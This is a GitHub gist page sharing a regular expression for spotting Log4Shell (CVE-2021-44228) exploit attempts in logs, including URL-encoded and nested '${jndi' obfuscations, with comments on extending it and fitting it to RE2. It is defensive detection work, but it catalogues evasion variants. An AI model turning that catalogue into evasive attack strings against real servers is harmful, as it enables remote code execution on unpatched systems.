Skip to content

Instantly share code, notes, and snippets.

@carlchan
Last active December 19, 2021 19:27
Show Gist options
  • Save carlchan/916ed5edbef7c8d1c00be67daae8933e to your computer and use it in GitHub Desktop.
Save carlchan/916ed5edbef7c8d1c00be67daae8933e to your computer and use it in GitHub Desktop.
Log4Shell regex
(\$|%(25)*24)(\{|%(25)*7B)(((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)(n|%[46]e)?(d|%[46]4)?(i|%[46]9)?(%(25)*7(d|%[46]4)|\})|(j|%[46]a)(n|%[46]e)?(d|%[46]4)?(i|%[46]9)?)((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)?(n|%[46]e)(d|%[46]4)?(i|%[46]9)?(%(25)*7(d|%[46]4)|\})|(j|%[46]a)?(n|%[46]e)(d|%[46]4)?(i|%[46]9)?)((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)?(n|%[46]e)?(d|%[46]4)(i|%[46]9)?(%(25)*7(d|%[46]4)|\})|(j|%[46]a)?(n|%[46]e)?(d|%[46]4)(i|%[46]9)?)((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)?(n|%[46]e)?(d|%[46]4)?(i|%[46]9)(%(25)*7(d|%[46]4)|\})|(j|%[46]a)?(n|%[46]e)?(d|%[46]4)?(i|%[46]9))|((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)?(n|%[46]e)?(d|%[46]4)?(i|%[46]9)?(%(25)*7(d|%[46]4)|\})|(j|%[46]a|n|%[46]e|d|%[46]4|i|%[46]9)+)+)
@carlchan
Copy link
Author

carlchan commented Dec 14, 2021

Catches a number of obfuscation and urlencoding techniques in logs looking for attempts to exploit log4j vulnerability, with low-false positives.
#CVE-2021-44228

@back2root
Copy link

The following matches even more:
https://github.com/back2root/log4shell-rex

@carlchan
Copy link
Author

@back2root nice, thank you

@Mario-Lugi
Copy link

@back2root: Is it possible to get the regex in RE2 format ?

@back2root
Copy link

back2root commented Dec 17, 2021

@Mario-Lugi can you test with RE2 or have you tried using it with RE2?
Where could I test?

I think there's a chance, the RegEx works already on RE2 if I don't oversee sth. from https://github.com/google/re2/wiki/Syntax

@Mario-Lugi
Copy link

@back2root : Hey, Thanks for the response, I executed some part of the regex and it worked. But I couldn't execute the complete code as it is too long. Is it possible to split the code into two ?

@back2root
Copy link

@Mario-Lugi There are ways to shorten the regex:

First, to enforce case sensitivity of the regex, I added all upper and lower case characters like: "/...[Aa].../". You could replace that with "/...a.../i" to save a few characters. Of course, this wouldn't work for encoded stuff.

Second, you might want to remove the base64 encoded option. I also plan to remove this option, as I realized that base64 is implemented for Log4j, but has not made it into a release yet. So the benefit of supporting base64 encoding may be small and the detection of base64 encoding is rudimentary. Log4ShellRex="${dollar}${curly_open}${sp}${plain}

Third, you can shift the tradeoff between the length of the regex and the false positive rate a bit by matching only the "${jndi:" part. To generate the RegEx for this, simply set: plain="${jndi}${sp}${colon}" in RegEx_Generator.sh.

Question: Where do you face length restrictions of a regular expression?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment